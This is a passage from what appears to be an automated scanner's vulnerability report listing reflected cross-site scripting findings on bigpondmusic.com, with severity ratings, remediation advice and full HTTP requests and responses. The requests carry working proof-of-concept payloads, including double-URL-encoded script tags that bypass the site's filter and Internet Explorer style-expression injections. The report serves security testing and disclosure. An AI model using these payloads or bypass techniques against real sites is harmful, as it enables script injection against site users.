Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88600


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/resb24ad"><script>alert(1)</script>1740019aa35/js/s_code.js" />
...[SNIP]...

2.207. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40c2f'%3b258fff16697 was submitted in the REST URL parameter 2. This input was echoed as 40c2f';258fff16697 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/res40c2f'%3b258fff16697/js/s_code.js HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'res40c2f';258fff16697';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '
...[SNIP]...

2.208. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0cdd28fe04 was submitted in the REST URL parameter 3. This input was echoed as f19e7"><script>alert(1)</script>e0cdd28fe04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res/jsf19e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0cdd28fe04/s_code.js HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:08:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res/jsf19e7"><script>alert(1)</script>e0cdd28fe04/s_code.js" />
...[SNIP]...

2.209. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c7d2'%3b2db515eb958 was submitted in the REST URL parameter 3. This input was echoed as 3c7d2';2db515eb958 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/res/js3c7d2'%3b2db515eb958/s_code.js HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:08:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:08:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'res';
   s.prop5 = 'js3c7d2';2db515eb958';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.210. http://bigpondmusic.com/bphf/res/js/s_code.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/s_code.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c46%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32850f3ca9f was submitted in the REST URL parameter 4. This input was echoed as f2c46"><script>alert(1)</script>32850f3ca9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res/js/s_code.jsf2c46%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32850f3ca9f HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; __utmc=183468341; __utmb=183468341.1.10.1290483706

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:08:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87839


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res/js/s_code.jsf2c46"><script>alert(1)</script>32850f3ca9f" />
...[SNIP]...

2.211. http://bigpondmusic.com/bpm/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bpm/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb144c02227 was submitted in the REST URL parameter 1. This input was echoed as 3b6e6"><script>alert(1)</script>bb144c02227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bpm3b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb144c02227/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bpm3b6e6"><script>alert(1)</script>bb144c02227/" />
...[SNIP]...

2.212. http://bigpondmusic.com/bpm/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bpm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dea9b'%3b7ad7f43b2b6 was submitted in the REST URL parameter 1. This input was echoed as dea9b';7ad7f43b2b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bpmdea9b'%3b7ad7f43b2b6/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87636


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bpmdea9b';7ad7f43b2b6';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.213. http://bigpondmusic.com/bpm/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bpm/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abfe"style%3d"x%3aexpression(alert(1))"b9936b22766 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4abfe"style="x:expression(alert(1))"b9936b22766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bpm/?4abfe"style%3d"x%3aexpression(alert(1))"b9936b22766=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 94013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bigpond TV - BigPond Music M
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bpm/?4abfe"style="x:expression(alert(1))"b9936b22766=1" />
...[SNIP]...

2.214. http://bigpondmusic.com/bpm/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bpm/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdf7"style%3d"x%3aexpression(alert(1))"754dba681da was submitted in the ref parameter. This input was echoed as 8bdf7"style="x:expression(alert(1))"754dba681da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bpm/?ref=Net-Head-Music-bpm8bdf7"style%3d"x%3aexpression(alert(1))"754dba681da HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 93974


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bigpond TV - BigPond Music M
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bpm/?ref=Net-Head-Music-bpm8bdf7"style="x:expression(alert(1))"754dba681da" />
...[SNIP]...

2.215. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53e51'%3b3973db429e9 was submitted in the REST URL parameter 1. This input was echoed as 53e51';3973db429e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse53e51'%3b3973db429e9/Albums/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87934


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse53e51';3973db429e9';
   s.prop4 = 'albums';
   s.prop5 = 'newrelease';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' +
...[SNIP]...

2.216. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f08f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74427646bdf was submitted in the REST URL parameter 1. This input was echoed as 7f08f"><script>alert(1)</script>74427646bdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse7f08f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74427646bdf/Albums/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse7f08f"><script>alert(1)</script>74427646bdf/Albums/NewRelease/Format-Album/By-ReleaseDate" />
...[SNIP]...

2.217. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3996e'%3b4afac108669 was submitted in the REST URL parameter 2. This input was echoed as 3996e';4afac108669 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/Albums3996e'%3b4afac108669/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


